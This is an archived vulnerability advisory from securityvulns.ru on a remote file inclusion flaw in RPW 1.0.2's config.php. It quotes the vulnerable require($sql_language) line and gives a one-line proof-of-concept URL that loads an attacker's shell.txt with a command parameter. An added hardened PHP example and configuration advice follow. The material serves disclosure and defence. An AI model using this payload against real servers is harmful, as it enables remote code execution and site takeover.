Computer Security
[EN] securityvulns.ru



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:24.01.2007
Subject:RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability:

              _________________________________
     ________|                                 |________
     \       |         Dr Max Virus            |       /
      \      |                                 |      /
      /      |_________________________________|      \
     /___________)                         (___________\
---------------------------------------------------------------------------------
---------------------------------------
Script:RPW
Affected Version:1.0.2
Download&Victim:http://vlad.tepesch.free.fr/mods/rpw1.0.2.zip
---------------------------------------------------------------------------------
---------------------------------------
Author:Dr Max Virus
---------------------------------------------------------------------------------
---------------------------------------
Bug in (config.php)
Vul Code;
require($sql_language);
---------------------------------------------------------------------------------
---------------------------------------
POC:
http://[target]/[path]/config.php?sql_language=shell.txt?&cmd=0wn3d By Dr Max Virus;
---------------------------------------------------------------------------------
---------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
---------------------------------------------------------------------------------
---------------------------------------
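
Added example, not part of the advisory and not RPW's own code: the reported require($sql_language) pattern next to a hardened form that maps a short key to a fixed file. The lang/ directory, the file names, the "lang" request parameter and the function name are hypothetical, and the language files are assumed to exist on disk.

```php
<?php
// Added illustration; not RPW code. Directory, file names, the "lang"
// parameter and resolve_language_file() are assumptions.

// Pattern reported in the advisory (config.php):
//     require($sql_language);
// $sql_language is not set by the script before use, so a request
// parameter of the same name (as in the advisory's PoC URL) can decide
// which file PHP loads and executes.

// Hardened form: input only selects a key; the path is never built from it.
const LANG_DIR = __DIR__ . '/lang';            // hypothetical directory
const LANG_FILES = [                            // hypothetical file names
    'en' => 'sql_english.php',
    'fr' => 'sql_french.php',
];

function resolve_language_file($requested): string
{
    // Reject arrays, unknown keys and anything path-like by falling back
    // to a fixed default instead of passing the value through.
    $key = (is_string($requested) && isset(LANG_FILES[$requested]))
        ? $requested
        : 'en';

    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . LANG_FILES[$key]);

    // realpath() resolves symlinks and "..": confirm the result still
    // lives under the language directory before it is ever included.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file missing or outside lang directory');
    }
    return $path;
}

// The variable is always assigned by the script itself before require.
$sql_language = resolve_language_file($_GET['lang'] ?? null);
require $sql_language;
```

Independently of the code fix, allow_url_include should stay Off in php.ini, and register_globals must be Off on PHP versions that still have it (it was removed in PHP 5.4).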
